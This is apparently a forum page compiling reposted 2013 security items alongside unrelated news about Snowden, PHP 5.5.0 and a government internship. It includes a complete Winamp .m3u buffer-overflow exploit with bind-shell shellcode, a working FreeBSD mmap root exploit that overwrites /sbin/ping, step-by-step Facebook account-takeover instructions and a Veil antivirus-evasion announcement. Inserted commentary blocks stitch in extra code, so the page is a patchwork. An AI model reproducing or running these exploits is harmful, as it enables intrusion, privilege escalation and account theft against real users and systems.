  X(a ## AAAAA); X(a ## AAAAAA); X(a ## AAAAAAA)

Y(D);
Y(DAAAAAAAA);
Y(DAAAAAAAAAAAAAAAA);
X(DAAAAAAAAAAAAAAAAAAAAAAAA);

// Funny story. Without global it doesn't compile (LNK1248).
// But with global it seems to overflow, and it compiles OK.
int global[0x12348];

DAAAAAAAAAAAAAAAAAAAAAAAAAA x;

int main(void) {
  printf("%p\n", &x);
  printf("%p\n", &x.DAAAAAAAAA_more[0]); // <--- customize this with changing
                                         //      DAA...AA_more to different
                                         //      amount of 'A'

  // Funny story no. 2. This above crashes the compiler (MSVC 16.00.30319.01):
  // test.cpp(61) : fatal error C1001: An internal error has occurred in the compiler.
  // (compiler file 'msc1.cpp', line 1420)
  // To work around this problem, try simplifying or changing the program near the locations listed above.
  // Please choose the Technical Support command on the Visual C++
  // Help menu, or open the Technical Support help file for more information
  // Internal Compiler Error in cl.exe. You will be prompted to send an error report to Microsoft later.
  //
  // (2154.dd4): Access violation - code c0000005 (first chance)
  // First chance exceptions are reported before any exception handling.
  // This exception may be expected and handled.
  // eax=00000000 ebx=0044dd34 ecx=0000006c edx=00000766 esi=049a8890 edi=049f3fc0
  // eip=73170bb7 esp=0044cd38 ebp=0044cd44 iopl=0         nv up ei pl nz na pe cy
  // cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
  // MSVCR100!_VEC_memcpy+0x5a:
  // 73170bb7 660f7f6740      movdqa  xmmword ptr [edi+40h],xmm4 ds:002b:049f4000=????????????????????????????????
  //
  return 0;
}

As previously mentioned, I didn't really have the time to delve into the details, but it seems the immediate reason of the crash is an invocation of memcpy() with a semi-controlled destination address (EDI is influenced by the source code). If you manage to prove that the bug is exploitable, let me know!

[h=2]Vendor communication timeline[/h]
2012-09-30: Report sent to Microsoft (DoS only PoC).
2012-10-01: Received ACK + request for further clarification.
2012-10-03: Received information that the crash appears to be exploitable.
2012-10-03: Sent clarification.
2012-11-01: Received confirmation that the issue is exploitable, and that it will not be treated as a security issue, but as a reliability issue.
2012-11-01: Sent description of a potential attack on a build server as a counterargument for it not being a security bug.
2012-11-06: Received ACK + information that the bug will be discussed again with the product team.
2012-12-18: Received "we are still working on it".
2013-01-31: Sent a ping.
2013-06-03: Sent a ping.
2013-06-15: Received information that the bug will be considered as a reliability issue. The build server documentation is updated with a security note.
2013-06-21: Sent a heads up with this blog post.
2013-06-24: Published this blog post.

[h=2]Update[/h]
A pretty awesome blog post with a gathering of compiler crashes (thx goes to Meredith for pointing this out): 57 Small Programs that Crash Compilers

Source: gynvael.coldwind//vx.log
  4. [h=2]Hijacking a Facebook Account with SMS[/h]
This post will demonstrate a simple bug which will lead to a full takeover of any Facebook account, with no user interaction. Enjoy.

Facebook gives you the option of linking your mobile number with your account. This allows you to receive updates via SMS, and also means you can login using the number rather than your email address.

The flaw lies in the /ajax/settings/mobile/confirm_phone.php end-point. This takes various parameters, but the two main ones are code, which is the verification code received via your mobile, and profile_id, which is the account to link the number to. The thing is, profile_id is set to your account (obviously), but changing it to your target’s doesn’t trigger an error.

To exploit this bug, we first send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. We receive an 8 character verification code back. We enter this code into the activation box (located here), and modify the profile_id element inside the fbMobileConfirmationForm form. Submitting the request returns a 200. You can see the value of __user (which is sent with all AJAX requests) is different from the profile_id we modified.

Note: You may have to reauth after submitting the request, but the password required is yours, not the target’s.

An SMS is then received with confirmation. Now we can initiate a password reset request against the user and get the code via SMS. Another SMS is received with the reset code. We enter this code into the form, choose a new password, and we’re done. The account is ours.

[h=4]Fix[/h]
Facebook responded by no longer accepting the profile_id parameter from the user.

[h=4]Timeline[/h]
23rd May 2013 - Reported
28th May 2013 - Acknowledgment of Report
28th May 2013 - Issue Fixed

[h=4]Note[/h]
The bounty assigned to this bug was $20,000, clearly demonstrating the severity of the issue.

Source: http://blog.fin1te.net/post/53949849983/hijacking-a-facebook-account-with-sms
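The bug in the post above is a missing ownership check: the endpoint trusted a client-supplied profile_id to decide which account a verified phone gets linked to. The following is an added Python 3 example, not code from Facebook or from the original post, that models the endpoint two ways: the vulnerable handler reads profile_id from the form, the fixed one ignores it and links the phone to the account behind the authenticated session. The store names, the account and phone values, and the SMS plumbing are all assumptions made for the demo.

```python
# Added example (not from the original post): a minimal model of the
# confirm_phone endpoint before and after the fix. Everything here
# (in-memory stores, account ids, phone numbers) is constructed for the demo.
import secrets

PENDING_CODES = {}     # verification code -> phone that texted 'F' (constructed store)
PHONE_TO_ACCOUNT = {}  # phone -> account id it is linked to (constructed store)


def sms_request_code(phone):
    """Server side of texting 'F' to the shortcode: mint an 8-char code for that phone."""
    code = secrets.token_hex(4)          # 8 hex characters, like the code in the post
    PENDING_CODES[code] = phone
    return code


def confirm_phone_vulnerable(session_user, form):
    """Pre-fix behaviour: the account to link is taken from the request body.
    A valid code for the attacker's own phone links that phone to any account
    named in profile_id, because nothing ties profile_id to the session."""
    phone = PENDING_CODES.pop(form.get("code", ""), None)
    if phone is None:
        return False
    PHONE_TO_ACCOUNT[phone] = form.get("profile_id", session_user)   # BUG: client-controlled
    return True


def confirm_phone_fixed(session_user, form):
    """Post-fix behaviour: profile_id is never read; only the authenticated
    session decides which account the verified phone is linked to."""
    phone = PENDING_CODES.pop(form.get("code", ""), None)
    if phone is None:
        return False
    PHONE_TO_ACCOUNT[phone] = session_user
    return True


def password_reset_target(phone):
    """Which account a phone-based password reset would act on."""
    return PHONE_TO_ACCOUNT.get(phone)


def replay_attack(handler):
    """Replay the post's steps against a handler. Returns the account whose
    password the attacker's phone can now reset (None if linking failed)."""
    PENDING_CODES.clear()
    PHONE_TO_ACCOUNT.clear()
    PHONE_TO_ACCOUNT["+440000000001"] = "victim"           # victim's own phone (constructed)
    attacker_phone = "+447700900123"                       # constructed
    code = sms_request_code(attacker_phone)                # attacker texts 'F' to the shortcode
    tampered = {"code": code, "profile_id": "victim"}      # profile_id swapped to the target
    if not handler(session_user="attacker", form=tampered):
        return None
    return password_reset_target(attacker_phone)


if __name__ == "__main__":
    print("vulnerable:", replay_attack(confirm_phone_vulnerable))   # victim
    print("fixed:     ", replay_attack(confirm_phone_fixed))        # attacker
```

The fix the post reports (stop accepting profile_id at all) is exactly what confirm_phone_fixed does; the general rule is that any "which account does this act on" decision in an authenticated request comes from the session, never from a request parameter, and a code or token should complete only the flow that issued it.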
  5. HKSAR Government issues statement on Edward Snowden
***************************************************
The HKSAR Government today (June 23) issued the following statement on Mr Edward Snowden:

Mr Edward Snowden left Hong Kong today (June 23) of his own accord for a third country through a lawful and normal channel.

The US Government earlier on made a request to the HKSAR Government for the issue of a provisional warrant of arrest against Mr Snowden. Since the documents provided by the US Government did not fully comply with the legal requirements under Hong Kong law, the HKSAR Government has requested the US Government to provide additional information so that the Department of Justice could consider whether the US Government's request can meet the relevant legal conditions. As the HKSAR Government has yet to have sufficient information to process the request for a provisional warrant of arrest, there is no legal basis to restrict Mr Snowden from leaving Hong Kong.

The HKSAR Government has already informed the US Government of Mr Snowden's departure.

Meanwhile, the HKSAR Government has formally written to the US Government requesting clarification on earlier reports about the hacking of computer systems in Hong Kong by US government agencies. The HKSAR Government will continue to follow up on the matter so as to protect the legal rights of the people of Hong Kong.

Ends/Sunday, June 23, 2013
Issued at HKT 16:05

Source: http://www.info.gov.hk/gia/general/201306/23/P201306230476.htm
  6. Stupid topic => cobra89 - ban (3 days). Useless posts that have nothing to do with the subject - warn.
  7. [h=1]PHP 5.5.0 Release Announcement[/h]
The PHP development team is proud to announce the immediate availability of PHP 5.5.0. This release includes a large number of new features and bug fixes.

The key features of PHP 5.5.0 include:
Added generators and coroutines.
Added the finally keyword.
Added a simplified password hashing API.
Added support for constant array/string dereferencing.
Added scalar class name resolution via ::class.
Added support for using empty() on the result of function calls and other expressions.
Added support for non-scalar Iterator keys in foreach.
Added support for list() constructs in foreach statements.
Added the Zend OPcache extension for opcode caching.
The GD library has been upgraded to version 2.1 adding new functions and improving existing functionality.
A lot more improvements and fixes.

Changes that affect compatibility:
PHP logo GUIDs have been removed.
Windows XP and 2003 support dropped.
Case insensitivity is no longer locale specific. All case insensitive matching for function, class and constant names is now performed in a locale independent manner according to ASCII rules.

For users upgrading from PHP 5.4, a migration guide is available detailing the changes between 5.4 and 5.5.0. For a full list of changes in PHP 5.5.0, see the ChangeLog.

Source: PHP: PHP 5.5.0 Release Announcement
  8. [h=1]Winamp 5.12 (.m3u) - Stack Based Buffer Overflow[/h]

# Exploit Title: Winamp 5.12 .m3u stack based buffer overflow
# Date: 16 June 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.winamp.com/
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=211
# Version: 5.12
# Tested on: Windows XP Professional SP2, English
# CVE: CVE-2006-0720
# BID: 16785
#
# Description from CVE-2006-0720
# Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13
# allows user-assisted attackers to cause a denial of service
# (crash) and possibly execute arbitrary code via a crafted
# .m3u file that causes an incorrect strncpy function call
# when the player pauses or stops the file.
#
#
# 1. Launch Winamp
# 2. Drag boom.m3u into Winamp window
# 3. Check for bind shell on port 28876
#

import struct

# playlist header; the parser reads these lines before the overlong entry
header = "#EXTM3U\n"
header += "#EXTINF:1234,Pwnage Rock\n"

# NtDisplayString egghunter: searches memory for the doubled tag "w00tw00t"
# and jumps to the shellcode that follows it
egghunter = (
    "\x90" * 64 +
    "\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58" +
    "\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +
    "\x77\x30\x30\x74" +                         # w00t
    "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" +
    "\x90" * 30
)

# filler up to the saved return address, with a NOP sled and the hunter in front
junk = "\x41" * 262 + "\x90" * 100 + egghunter

# bind shell on port 28876
# https://code.google.com/p/w32-bind-ngs-shellcode/
# msfencode -i w32-bind-ngs-shellcode.bin -b "\x00\x0a\x0d\x5c"
# [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
    "w00tw00t" +
    "\x90" * 239 +
    "\xbf\x26\x63\xb2\x20\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9" +
    "\xb1\x36\x83\xea\xfc\x31\x7a\x10\x03\x7a\x10\xc4\x96\x83" +
    "\xe9\x6c\xd2\x95\xd9\xe7\x92\x59\x91\x81\x46\xe9\xcb\x65" +
    "\xfc\x93\x33\xfe\x34\x54\x7b\x18\x4c\x57\xd2\x70\x9c\xc8" +
    "\xe6\xb2\x88\x90\x5e\xc5\x3b\x35\xe8\xa6\xb5\x5d\x9f\x5e" +
    "\x70\x5e\x89\x52\x52\xad\x40\x8d\x73\xde\xf9\x10\x2d\x60" +
    "\xaf\xc5\x9c\xe1\xa0\xc5\xba\xa9\xb5\x48\xff\xbe\x96\x6f" +
    "\x87\xc1\xcd\x04\x3c\xe2\x10\xf3\x95\xd3\xc0\x41\x91\x20" +
    "\x74\x44\x4b\xfc\x40\xea\xa7\x8c\x84\x36\xfb\x1f\xa0\x41" +
    "\x3e\xc7\x3f\x46\x61\x8c\x8b\xbc\x9f\x7b\x04\x0b\x8b\x2a" +
    "\x90\x38\xa8\xcd\x4f\x37\x38\xce\x8b\xd6\x12\x51\xad\xd1" +
    "\x11\x5a\x5f\xbf\xdd\x09\xa0\xef\x89\x38\xde\x31\x45\x36" +
    "\x6e\x13\x04\x47\x40\x06\xa9\x68\xf4\xd9\x79\x77\x08\x56" +
    "\xb6\xed\xe7\x3f\x14\xa4\xf8\x6f\xe3\x87\x73\x77\xdd\xd5" +
    "\x2e\xef\x7d\xb7\xaa\xcf\x0c\x3b\x17\x37\xa4\x6f\xfc\x81" +
    "\xfd\x86\x02\x59\x85\x65\x21\x36\xdb\xc7\x7b\x7e\x9c\x08" +
    "\x73\x29\x71\x85\xd3\x87\x8a\x7f\x38\xac\x33\x7c\x29\x78" +
    "\x44\x83\x55"
)

# 022B368C , call ecx , C:\Program Files\Winamp\pxsdkpls.dll
ret = struct.pack("<I", 0x022B368C)

# for some reason eip doesn't get overwritten and Winamp
# crashes differently unless the 4th byte after ret is
# a 0xB0. there's probably an easier way to do this but
# this is what the fuzzer found first so... wtf
wtf = "\x43\x43\x43\xB0"

f = open("boom.m3u", "w")
f.write(header + junk + shellcode + ret + wtf)
f.close()

print "Created boom.m3u"
print "1. Open Winamp"
print "2. Drag boom.m3u into Winamp window"
print "3. Check for bind shell on port 28876"

Source: Winamp 5.12 (.m3u) - Stack Based Buffer Overflow
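Before dropping a buffer like the one above on a target, a practitioner checks three things: that no byte in the payload belongs to the bad-character set msfencode was told to avoid, that the packed return address itself is clean, and where the egg tag actually lands (the hunter contains one "w00t" of its own, which is why the egg is the doubled "w00tw00t"). The following is an added Python 3 example, not part of superkojiman's exploit: it reuses the exploit's layout and its egghunter bytes, but the 16-byte int3 sled standing in for the bind shell, the function names and the constructed payload are assumptions made for the demo.

```python
# Added example (not from the original exploit): sanity checks on a crafted
# buffer before it is written to the .m3u. Python 3 bytes throughout.
import struct

BADCHARS = b"\x00\x0a\x0d\x5c"   # the set passed to msfencode -b in the exploit

# NtDisplayString egghunter, byte-for-byte the one in the exploit (NOP padding omitted)
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x43\x58"
    b"\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
    b"w00t"
    b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)


def find_bad_chars(buf, badchars=BADCHARS):
    """Every (offset, byte) in buf that belongs to the bad-character set."""
    return [(i, b) for i, b in enumerate(buf) if b in badchars]


def find_tag(buf, tag):
    """All offsets of tag in buf, including overlapping hits."""
    hits, start = [], 0
    while True:
        i = buf.find(tag, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def build_sample():
    """Constructed payload with the exploit's layout: junk, NOP sled, egghunter,
    tagged shellcode, packed return address, tail. Returns (payload, ret_offset).
    The #EXTM3U header lines are deliberately left out of the scan: their 0x0a
    bytes are the line terminators the playlist parser needs, not bad chars."""
    shellcode = b"w00tw00t" + b"\xcc" * 16                    # placeholder, not the bind shell
    body = b"A" * 262 + b"\x90" * 100 + EGGHUNTER + shellcode
    payload = body + struct.pack("<I", 0x022B368C) + b"\x43\x43\x43\xB0"
    return payload, len(body)


def audit(payload, ret_offset, badchars=BADCHARS):
    """Summarise what to look at before shipping: bad bytes anywhere, the exact
    bytes that land on the saved return address, and the tag hits. Exactly one
    single 'w00t' inside the hunter is expected; the doubled tag must be unique."""
    return {
        "bad_bytes": find_bad_chars(payload, badchars),
        "ret_bytes": payload[ret_offset:ret_offset + 4].hex(),
        "single_tag": find_tag(payload, b"w00t"),
        "double_tag": find_tag(payload, b"w00tw00t"),
    }


if __name__ == "__main__":
    p, off = build_sample()
    for name, value in audit(p, off).items():
        print(name, value)
```

On the constructed sample, bad_bytes is empty, ret_bytes is the little-endian form of 0x022B368C, single_tag reports the hunter's own tag at 380 plus the two halves of the egg at 394 and 398, and double_tag reports only 394. A second "w00tw00t" anywhere in the buffer, or a bad byte in the encoded shellcode, would show up here before it shows up as a truncated copy in the debugger.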
  9. [h=1]Memcached Remote Denial of Service PoC[/h]
A long time ago, in 2011, a rather serious vulnerability was reported in Memcached. It is now 2013, and the vulnerability still exists in the latest version on the memcached Google Code page. The report is here: https://code.google.com/p/memcached/issues/detail?id=192

Now, as you can see, by sending a specially crafted packet, we can cause Memcached to segfault, and essentially die. Memcached is used by a lot of high profile sites to speed up page load times, and killing it would impact a bit on site performance, so I was rather curious as to why this bug had not yet been killed.

As you can see from the report, the vulnerability is trivial to exploit. Just send the magic packet of death and it kills the memcached service. I tried to get remote code execution from it, but had no luck at all. Perhaps one of you might have more luck!

memcached ded

Exploit code available to download here: killthebox.py

As always, responsible use is encouraged. Killing $(big website) memcached might get you in trouble, so don’t do it.

As for the memcached devs: You have known about this for two bloody years and never fixed it. This is terribly irresponsible of you. Fix it.

Source: Memcached Remote Denial of Service PoC | Insecurety Research
  10. [h=2]FreeBSD mmap Privilege Escalation Exploit[/h]

/**
 * FreeBSD privilege escalation CVE-2013-2171 (credits Konstantin Belousov & Alan Cox)
 *
 * tested on FreeBSD 9.1
 * ref: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
 *
 * @_hugsy_
 *
 * Syntax :
 * $ id
 * uid=1001(user) gid=1001(user) groups=1001(user)
 * $ gcc -Wall ./mmap.c && ./a.out
 * [+] Saved old '/sbin/ping'
 * [+] Using mmap-ed area at 0x281a4000
 * [+] Attached to 3404
 * [+] Copied 4917 bytes of payload to '/sbin/ping'
 * [+] Triggering payload
 * # id
 * uid=0(root) gid=0(wheel) egid=1001(user) groups=1001(user),0(wheel)
 *
 * Note : TARGET (default /sbin/ping) will lose its SUID bit on restore, must be restored by hand
 *
 */

#include <sys/mman.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>

#define LEN 1000*getpagesize()
#define TARGET "/sbin/ping" // will lose its SUID bit on restore, must be restored by hand

/* Parent side: the child holds a read-only MAP_SHARED mapping of TARGET;
 * ptrace(PT_WRITE_D) into that mapping writes through to the SUID file. */
void kaboom(int pid, caddr_t addr)
{
  int nb, i, a, fd, n;
  char buf[60000] = {0,};

  a = i = 0;

  /* keep a copy of the original binary so it can be put back afterwards */
  fd = open(TARGET, O_RDONLY);
  nb = read(fd, buf, 60000);
  close(fd);
  printf("[+] Saved old '%s'\n", TARGET);
  printf("[+] Using mmap-ed area at %p\n", addr);

  if (ptrace(PT_ATTACH, pid, 0, 0) < 0) {
    perror("[-] ptrace(PT_ATTACH) failed");
    return;
  }
  printf("[+] Attached to %d\n", pid);
  wait(NULL);

  /* build the setuid(0) shell payload that will replace TARGET */
  fd = open("./sc.c", O_WRONLY|O_CREAT, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH);
  write(fd, "#include <stdio.h>\nmain(){ char* s[]={\"/bin/sh\",NULL};setuid(0);execve(s[0],s,0); }\n", 84);
  close(fd);

  if (system("gcc -o ./sc ./sc.c") != 0) {
    perror("[-] gcc");
    return;
  }

  /* copy the payload into the child's mapping one int at a time */
  fd = open("./sc", O_RDONLY);
  while (1) {
    int a;
    int n = read(fd, &a, sizeof(int));
    if (n <= 0) break;
    if (ptrace(PT_WRITE_D, pid, addr+i, a) < 0) {
      perror("[-] ptrace(PT_WRITE_D) failed");
      return;
    }
    i+=n;
  }
  close(fd);
  printf("[+] Copied %d bytes of payload to '%s'\n", i, TARGET);

  printf("[+] Triggering payload\n");
  system(TARGET);

  /* write the saved bytes back over the payload */
  printf("[+] Restoring '%s'\n", TARGET);
  for (n=0, i=0; n<nb; n++) {
    if (ptrace(PT_WRITE_D, pid, addr+n, *(buf+n)) < 0) {
      perror("[-] ptrace(PT_WRITE_D) failed");
      return;
    }
  }

  ptrace(PT_DETACH, pid, 0, 0);
  printf("[+] Done\n");
  return;
}

/* Child side: just keep the mapping alive long enough to be written into. */
void dummy(int fd, caddr_t addr)
{
  sleep(1);
  munmap(addr, LEN);
  close(fd);
  return;
}

int main(int argc, char** argv, char** envp)
{
  int fd = open(TARGET, O_RDONLY);
  caddr_t addr = mmap(NULL, LEN, PROT_READ, MAP_SHARED, fd, 0);
  pid_t forked_pid = fork();

  switch(forked_pid) {
    case -1:
      return -1;
    case 0:
      dummy(fd, addr);
      break;
    default:
      munmap(addr, LEN);
      close(fd);
      kaboom(forked_pid, addr);
      wait(NULL);
      break;
  }

  return 0;
}

Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  11. They invented hacking.
  12. We'll see over the weekend.
  13. I hadn't seen that "Self".
  14. How do you exploit it?
  15. New Bounty Program Details - Security Research & Defense - Site Home - TechNet Blogs
  16. I didn't write it. There would be a great many things to say. Have a little patience...
  17. [h=3]Evidence that the NSA Is Storing Voice Content, Not Just Metadata[/h] Interesting speculation that the NSA is storing everyone's phone calls, and not just metadata. Definitely worth reading. I expressed skepticism about this just a month ago. My assumption had always been that everyone's compressed voice calls is just too much data to move around and store. Now, I don't know. There's a bit of a conspiracy-theory air to all of this speculation, but underestimating what the NSA will do is a mistake. General Alexander has told members of Congress that they can record the contents of phone calls. And they have the technical capability. Earlier reports have indicated that the NSA has the ability to record nearly all domestic and international phone calls -- in case an analyst needed to access the recordings in the future. A Wired magazine article last year disclosed that the NSA has established "listening posts" that allow the agency to collect and sift through billions of phone calls through a massive new data center in Utah, "whether they originate within the country or overseas." That includes not just metadata, but also the contents of the communications. William Binney, a former NSA technical director who helped to modernize the agency's worldwide eavesdropping network, told the Daily Caller this week that the NSA records the phone calls of 500,000 to 1 million people who are on its so-called target list, and perhaps even more. "They look through these phone numbers and they target those and that's what they record," Binney said. Brewster Kahle, a computer engineer who founded the Internet Archive, has vast experience storing large amounts of data. He created a spreadsheet this week estimating that the cost to store all domestic phone calls a year in cloud storage for data-mining purposes would be about $27 million per year, not counting the cost of extra security for a top-secret program and security clearances for the people involved. 
I believe that, to the extent that the NSA is analyzing and storing conversations, they're doing speech-to-text as close to the source as possible and working with that. Even if you have to store the audio for conversations in foreign languages, or for snippets of conversations the conversion software is unsure of, it's a lot fewer bits to move around and deal with.

And, by the way, I hate the term "metadata." What's wrong with "traffic analysis," which is what we've always called that sort of thing?

Source: Schneier on Security: Evidence that the NSA Is Storing Voice Content, Not Just Metadata
  18. [h=1]Veil – AV Evasion[/h]
[h=1]Veil v2.0 : Towards a True Framework[/h]
June 17, 2013 by The Grayhound
Repo Location: https://github.com/ChrisTruncer/Veil

Team Veil is proud to announce the release of Veil v2.0. This drastically reworked version of the Veil AV-evasion framework incorporates a new structure, a slew of new features, and a variety of new payloads:

New Structure
Veil has moved from a single flat file towards a truly modular framework:
Payload modules dropped into ./modules/payloads/[language] are loaded into the framework automatically
Common reusable functions are stored in various files in ./modules/common/*
Source/compiled files are output by default to ./output/source/ and ./output/compiled/
./config/update.py is executed automatically on first run, producing a common configuration file at ./config/veil.py, which can be edited manually
External tools used by payloads are stored in ./tools/
./doc/* contains pydoc generated documentation for the framework
A tutorial describing how to develop payload modules is forthcoming.

New features
Veil’s menus and interface have been redesigned for increased usability.
One of the common requests for Veil was the inclusion of additional msfvenom shellcode payloads. To incorporate this, we built in automatic crawling of the metasploit /windows/* payload tree and the extraction of necessary payload parameters. The payloads should tab complete within the shellcode selection menu, in msfvenom windows/PAYLOAD format.
Tab completion has also been added in a variety of places around the framework, including most menus, LHOST for IP completion, and LPORT for 4444 completion. Try it out!
A new python ‘crypter’ named ‘pyherion’ (inspired by Null Security’s Hyperion) has been introduced, which encapsulates python payload files in an AES/base64 encoded wrapper that dynamically decodes/decrypts the python code in memory and executes it. A standalone version has also been introduced in ./tools/pyherion.py .
A short post explaining its implementation details will be forthcoming.
Command line switches have been implemented for almost all options. Type ./Veil.py -h for details.

New payloads
C payloads – Using both a void pointer reference and direct injection into memory with VirtualAlloc calls
Powershell – VirtualAlloc injection, MSF-psexec formatted resource file generation, and download/execution of a secondary payload.
C# payloads – VirtualAlloc and base64 obfuscated payloads have been introduced, along with C# .exe compilation.
Native payloads – hyperion and pescrambler

Source: https://www.veil-evasion.com/
  19. [h=1]Internship at the Government for young students or graduates with basic IT knowledge. What criteria must they meet[/h]
Students or graduates of bachelor's degree programs aged up to 25 with basic IT knowledge can apply until July 1 for a specialist work placement program (internship) at the Chancellery of the Prime Minister or the General Secretariat of the Government.

The initiative is based on the governing program, which provides for the creation of a real internship system in central and local public administration for students with outstanding results, the Executive informs.

An internship program involves a work placement for professional careers, intended for students or university graduates, through which they can become familiar with the specifics of a structure and get to know its workflow by directly supporting employees in carrying out daily activities.

To be included in the program, young people must cumulatively meet a series of eligibility criteria: hold Romanian citizenship, be aged up to 25, be students or recent graduates of bachelor's degree programs, know well at least one international language, and have basic IT knowledge (advanced knowledge for applications to the Online Services and Design Directorate). Candidates chosen for the shortlist will be asked for additional supporting materials for their application.

The application form can be accessed from the website internship.gov.ro, and the deadline for submitting applications, by e-mail to the program's official address internship@gov.ro, is July 1, 2013 inclusive. Applications received after that will not be considered.

The selected young people will be assigned, according to their skills, to the Chancellery of the Prime Minister or the General Secretariat of the Government.

Source: Internship at the Government for young students or graduates with basic IT knowledge. What criteria must they meet - Mediafax
  20. How NSA access was built into Windows
Duncan Campbell 04.09.1999

Careless mistake reveals subversion of Windows by NSA.

A CARELESS mistake by Microsoft programmers has revealed that special access codes prepared by the US National Security Agency have been secretly built into Windows. The NSA access system is built into every version of the Windows operating system now in use, except early releases of Windows 95 (and its predecessors). The discovery comes close on the heels of the revelations earlier this year that another US software giant, Lotus, had built an NSA "help information" trapdoor into its Notes system, and that security functions on other software systems had been deliberately crippled.

The first discovery of the new NSA access system was made two years ago by British researcher Dr Nicko van Someren. But it was only a few weeks ago when a second researcher rediscovered the access system. With it, he found the evidence linking it to NSA.

Computer security specialists have been aware for two years that unusual features are contained inside a standard Windows software "driver" used for security and encryption functions. The driver, called ADVAPI.DLL, enables and controls a range of security functions. If you use Windows, you will find it in the C:\Windows\system directory of your computer.

ADVAPI.DLL works closely with Microsoft Internet Explorer, but will only run cryptographic functions that the US government allows Microsoft to export. That information is bad enough news, from a European point of view. Now, it turns out that ADVAPI will run special programmes inserted and controlled by NSA. As yet, no-one knows what these programmes are, or what they do.

Dr Nicko van Someren reported at last year's Crypto 98 conference that he had disassembled the ADVAPI driver. He found it contained two different keys.
One was used by Microsoft to control the cryptographic functions enabled in Windows, in compliance with US export regulations. But the reason for building in a second key, or who owned it, remained a mystery. A second key Two weeks ago, a US security company came up with conclusive evidence that the second key belongs to NSA. Like Dr van Someren, Andrew Fernandez, chief scientist with Cryptonym of Morrisville, North Carolina, had been probing the presence and significance of the two keys. Then he checked the latest Service Pack release for Windows NT4, Service Pack 5. He found that Microsoft's developers had failed to remove or "strip" the debugging symbols used to test this software before they released it. Inside the code were the labels for the two keys. One was called "KEY". The other was called "NSAKEY". Fernandes reported his re-discovery of the two CAPI keys, and their secret meaning, to "Advances in Cryptology, Crypto'99" conference held in Santa Barbara. According to those present at the conference, Windows developers attending the conference did not deny that the "NSA" key was built into their software. But they refused to talk about what the key did, or why it had been put there without users' knowledge. A third key?! But according to two witnesses attending the conference, even Microsoft's top crypto programmers were astonished to learn that the version of ADVAPI.DLL shipping with Windows 2000 contains not two, but three keys. Brian LaMachia, head of CAPI development at Microsoft was "stunned" to learn of these discoveries, by outsiders. The latest discovery by Dr van Someren is based on advanced search methods which test and report on the "entropy" of programming code. Within the Microsoft organisation, access to Windows source code is said to be highly compartmentalized, making it easy for modifications to be inserted without the knowledge of even the respective product managers. 
Researchers are divided about whether the NSA key could be intended to let US government users of Windows run classified cryptosystems on their machines or whether it is intended to open up anyone's and everyone's Windows computer to intelligence gathering techniques deployed by NSA's burgeoning corps of "information warriors". According to Fernandez of Cryptonym, the result of having the secret key inside your Windows operating system "is that it is tremendously easier for the NSA to load unauthorized security services on all copies of Microsoft Windows, and once these security services are loaded, they can effectively compromise your entire operating system". The NSA key is contained inside all versions of Windows from Windows 95 OSR2 onwards. "For non-American IT managers relying on Windows NT to operate highly secure data centres, this find is worrying", he added. "The US government is currently making it as difficult as possible for "strong" crypto to be used outside of the US. That they have also installed a cryptographic back-door in the world's most abundant operating system should send a strong message to foreign IT managers". "How is an IT manager to feel when they learn that in every copy of Windows sold, Microsoft has a 'back door' for NSA - making it orders of magnitude easier for the US government to access your computer?" he asked. Can the loophole be turned round against the snoopers? Dr van Someren feels that the primary purpose of the NSA key inside Windows may be for legitimate US government use. But he says that there cannot be a legitimate explanation for the third key in Windows 2000 CAPI. "It looks more fishy", he said. Fernandez believes that NSA's built-in loophole can be turned round against the snoopers. The NSA key inside CAPI can be replaced by your own key, and used to sign cryptographic security modules from overseas or unauthorised third parties, unapproved by Microsoft or the NSA. 
This is exactly what the US government has been trying to prevent. A demonstration "how to do it" program that replaces the NSA key can be found on Cryptonym's website. According to one leading US cryptographer, the IT world should be thankful that the subversion of Windows by NSA has come to light before the arrival of CPUs that handles encrypted instruction sets. These would make the type of discoveries made this month impossible. "Had the next-generation CPU's with encrypted instruction sets already been deployed, we would have never found out about NSAKEY." Sursa: How NSA access was built into Windows | Telepolis
  21. Nytro

    Fun stuff

    http://fbcdn-sphotos-g-a.cloudliv.net/hphotos-ak-ash4/5223013_371023452991370_522301357_n.jpgb
  22. [h=1]AutoRun. Reloaded[/h]

Konstantin Markov, Kaspersky Lab Expert. Posted June 13, 11:17 GMT

Recent months have produced little of interest among worms written in Java and script languages such as JavaScript and VBScript. The main reason behind this was the limited proficiency of the virus writers, whose creations were anything but remarkable. However, a couple of malware samples grabbed our attention; their complexity is testimony to the fact that professionals sometimes get involved as well. Kaspersky Lab’s products detect these special worms as Worm.JS.AutoRun and Worm.Java.AutoRun. They are also detected by heuristic methods as HEUR:Worm.Script.Generic and HEUR:Worm.Java.Generic respectively.

These two worms have three key features in common: heavy obfuscation, backdoor-type essential payloads, and similar methods of propagation. Both worms spread by copying themselves and the configuration file autorun.inf into the root folders of logical volumes of removable storage media and network disks. If these infected storages are opened on other computers, the infection can spread. Having infected the operating system and established a foothold on the victim computer, the malicious programs deploy their principal payload.

For months, the number of AutoRun worms detected on Kaspersky Lab users’ computers remained essentially unchanged. According to Kaspersky Security Network data, half of all script worms spread themselves this way. As for Java worms, this is not their usual method of propagation. However, in the last three months we have seen a dramatic rise in the number of new Worm.Java.AutoRun modifications.

